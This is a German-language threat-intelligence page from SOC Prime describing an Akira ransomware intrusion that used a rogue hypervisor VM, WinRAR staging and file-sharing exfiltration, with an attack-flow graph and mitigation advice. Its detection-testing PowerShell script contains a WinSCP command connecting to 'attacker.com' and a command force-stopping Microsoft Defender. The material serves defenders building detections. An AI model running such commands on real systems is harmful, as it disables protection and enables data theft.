SOC Prime Bias: Hoch

19 Jun 2026 07:31 UTC
newspaper icon Huntress

Akira, LimeWire und der bittere Nachgeschmack von Datenexfiltration

Author Photo
SOC Prime Team linkedin icon Folgen
Akira, LimeWire und der bittere Nachgeschmack von Datenexfiltration
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Ein Akira-Ransomware-Affiliate erlangte unbefugten Zugriff auf einen Hypervisor und erstellte eine neue virtuelle Maschine, um diese als verdeckte Zwischenstelle zu nutzen. Der Angreifer verließ sich auf diese isolierte VM, um der Sicherheitsüberwachung zu entgehen, Daten mit WinRAR vorzubereiten und Archive über die Easyupload.io Datei-Sharing-Plattform zu exfiltrieren. Der Fall zeigt, wie Bedrohungsakteure weiterhin legale Upload-Dienste für Datendiebstahl missbrauchen.

Untersuchung

Die Untersuchung kombinierte EDR-Telemetriedaten, Windows-Ereignisprotokolle und den Browserverlauf von Microsoft Edge, um den Einbruch zu rekonstruieren. Analysten stellten zudem ein VHDX-Abbild der betrügerischen virtuellen Maschine wieder her, das aufzeigte, wie der Angreifer Microsoft Defender deaktivierte und den Akira-Ransomware-Betrieb einrichtete. Die forensische Überprüfung der VM enthüllte die genauen Werkzeuge, Websites und Arbeitsabläufe, die während der Staging- und Exfiltrationsphasen verwendet wurden.

Minderung

Organisationen sollten auf das Auftreten neuer oder unautorisierter Endpunkte und virtueller Maschineninstanzen in ihrer Umgebung achten. Starke Sichtbarkeit bei Remote-Zugriffen auf kritische Systeme wie Hypervisoren und Domain-Controller ist essentiell. Es ist auch wichtig, den Zugang zu bekannten Datei-Sharing- und Schnell-Upload-Diensten, die für Exfiltration genutzt werden können, einzuschränken oder genau zu überwachen.

Reaktion

Wenn ein unautorisierter Zugriff auf den Hypervisor festgestellt wird, isolieren Sie sofort den betroffenen Hypervisor und alle neu erstellten virtuellen Maschinen. Führen Sie eine forensische Analyse der VM-Abbilder durch, um das Ausmaß der Datenbereitstellung und -exfiltration zu bestimmen. Überprüfen Sie Zugriffprotokolle, um den ursprünglichen Einstiegspunkt nachzuverfolgen und zu bestätigen, dass kein dauerhafter Angreiferzugriff besteht.

graph TB %% Klassendefinition classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Phase des initialen Zugriffs action_access[„<b>Aktion</b> – <b>T1563.002 und T1021</b><br/>Unbefugter Zugriff über Remote-Dienste<br/>und Sitzungshijacking mit Ziel<br/>Domänencontroller und Hypervisor.“] class action_access action %% Aufklärungsphase action_recon_ad[„<b>Aktion</b> – <b>T1087 und T1681</b><br/>Aufklärung durch Enumeration von<br/>Active-Directory-Benutzern und Computern.“] class action_recon_ad action action_recon_soft[„<b>Aktion</b> – <b>T1592.002</b><br/>Ermittlung von Informationen<br/>über Host-Software.“] class action_recon_soft action %% Umgehung von Schutzmaßnahmen und Staging action_hide_artifact[„<b>Aktion</b> – <b>T1564.006</b><br/>Verbergen von Artefakten durch Ausführung<br/>einer neuen virtuellen Instanz auf dem Hypervisor,<br/>um Sicherheitsagenten zu umgehen.“] class action_hide_artifact action action_disable_defender[„<b>Aktion</b> – <b>T1685</b><br/>Beeinträchtigung der Abwehr durch Deaktivierung<br/>von Microsoft Defender auf der neuen VM.“] class action_disable_defender defense %% Laterale Bewegung und Datensammlung action_lateral_move[„<b>Aktion</b> – <b>T1080</b><br/>Laterale Bewegung zum<br/>Dateiserver der Organisation.“] class action_lateral_move action tool_winrar[„<b>Werkzeug</b> – <b>Name</b>: WinRAR<br/><b>Beschreibung</b>: Wird zum Archivieren<br/>sensibler Dateien in Freigabeordnern verwendet.“] class tool_winrar tool action_collect_data[„<b>Aktion</b> – <b>T1560</b><br/>Datensammlung durch Archivierung<br/>sensibler Dateien.“] class action_collect_data action %% Exfiltrationsphase action_stage_data[„<b>Aktion</b> – <b>T1074.002</b><br/>Datenbereitstellung durch Zwischenspeicherung<br/>von Archiven vor der Exfiltration.“] class action_stage_data action action_move_tools[„<b>Aktion</b> – <b>T1570</b><br/>Eingehende Werkzeugübertragung zum Verschieben<br/>von Angriffswerkzeugen in die Umgebung.“] class action_move_tools action tool_winscp[„<b>Werkzeug</b> – <b>Name</b>: WinSCP<br/><b>Beschreibung</b>: Wird für<br/>Datenübertragungen verwendet.“] class tool_winscp tool tool_easyupload[„<b>Werkzeug</b> – <b>Name</b>: Easyupload.io / LimeWire<br/><b>Beschreibung</b>: Webbasierter Dateiübertragungsdienst,<br/>der für Exfiltration verwendet wird.“] class tool_easyupload tool action_exfiltrate[„<b>Aktion</b> – <b>T1071.002 und T1105</b><br/>Exfiltration über webbasierte Dienste<br/>und Dateiübertragungsprotokolle.“] class action_exfiltrate action %% Auswirkungen malware_akira[„<b>Malware</b> – <b>Name</b>: Akira ransomware<br/><b>Datei</b>: akira.exe<br/><b>Beschreibung</b>: Verschlüsselt Dateien auf<br/>eingebundenen Netzwerkfreigaben.“] class malware_akira malware action_impact[„<b>Aktion</b> – <b>T1486</b><br/>Auswirkung durch Datenverschlüsselung.“] class action_impact action %% Verbindungsfluss action_access –>|führt_zu| action_recon_ad action_access –>|führt_zu| action_recon_soft action_recon_ad –>|führt_zu| action_hide_artifact action_recon_soft –>|führt_zu| action_hide_artifact action_hide_artifact –>|führt_zu| action_disable_defender action_disable_defender –>|führt_zu| action_lateral_move action_lateral_move –>|führt_zu| action_collect_data action_collect_data –>|verwendet| tool_winrar action_collect_data –>|führt_zu| action_stage_data action_stage_data –>|führt_zu| action_move_tools action_move_tools –>|führt_zu| action_exfiltrate action_exfiltrate –>|verwendet| tool_winscp action_exfiltrate –>|verwendet| tool_easyupload action_exfiltrate –>|führt_zu| malware_akira malware_akira –>|resultiert_in| action_impact

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Vorab-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

  • Angriffs-Erzählung & Befehle: Der Gegner hat initialen Zugriff erlangt und möchte den Einfluss eskalieren. Zuerst listen sie sensible Dateien auf, indem sie nach bekannten Textdateien wie AdUsers.txtsuchen. Zur Vorbereitung der Exfiltration verwenden sie WinRAR.exe um die Daten zu komprimieren. Dann bereiten sie ihr Exfiltrationstool vor, WinSCP.exeund führen schließlich die akira.exe Ransomware-Nutzlast aus. Um zu verhindern, dass der EDR/Antivirus den Prozess beendet, versuchen sie den Windefend Dienst zu stoppen. Diese spezifische Abfolge von Befehlszeilenargumenten und Dienststatusänderungen soll die Akira-spezifische Erkennungslogik auslösen.

  • Regressionstest-Skript:

    # Simulationsskript zur Validierung der Akira-Ransomware-Erkennung
# HINWEIS: Dieses Skript erfordert Administratorrechte, um den Defender-Dienst zu stoppen.

Write-Host "[+] Start der Akira-Ransomware-Simulation..." -ForegroundColor Cyan

# 1. Ermitteln/Enumerieren simulieren (T1119)
Write-Host "[+] Schritt 1: Datei-Auflistung über Notepad simulieren..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Datenarchivierung simulieren (T1560.003)
# Hinweis: Wir gehen davon aus, dass WinRAR vorhanden ist oder wir die Befehlszeilenaktivität simulieren
Write-Host "[+] Schritt 2: Datenarchivierung mit WinRAR simulieren..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Exfiltrationstool-Vorbereitung simulieren (T1105)
Write-Host "[+] Schritt 3: Exfiltrationstool-Ausführung simulieren..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Ransomware-Ausführung simulieren (T1204.002)
Write-Host "[+] Schritt 4: Akira-Nutzlast-Ausführung simulieren..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Defender-Deaktivierung simulieren (T1564.006)
# Dies löst EventID 7036 im Systemprotokoll aus.
Write-Host "[+] Schritt 5: Versuch, Microsoft Defender zu stoppen..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Warnungen." -ForegroundColor Green

  • Bereinigungskommandos:

    # Bereinigungsskript
Write-Host "[+] Bereinigung der Simulationsartefakte..." -ForegroundColor Cyan

# Neustart des Defender-Dienstes
Start-Service -Name "Windefend"

# Entfernen Sie simulierte Dateien
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Bereinigung abgeschlossen." -ForegroundColor Green

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten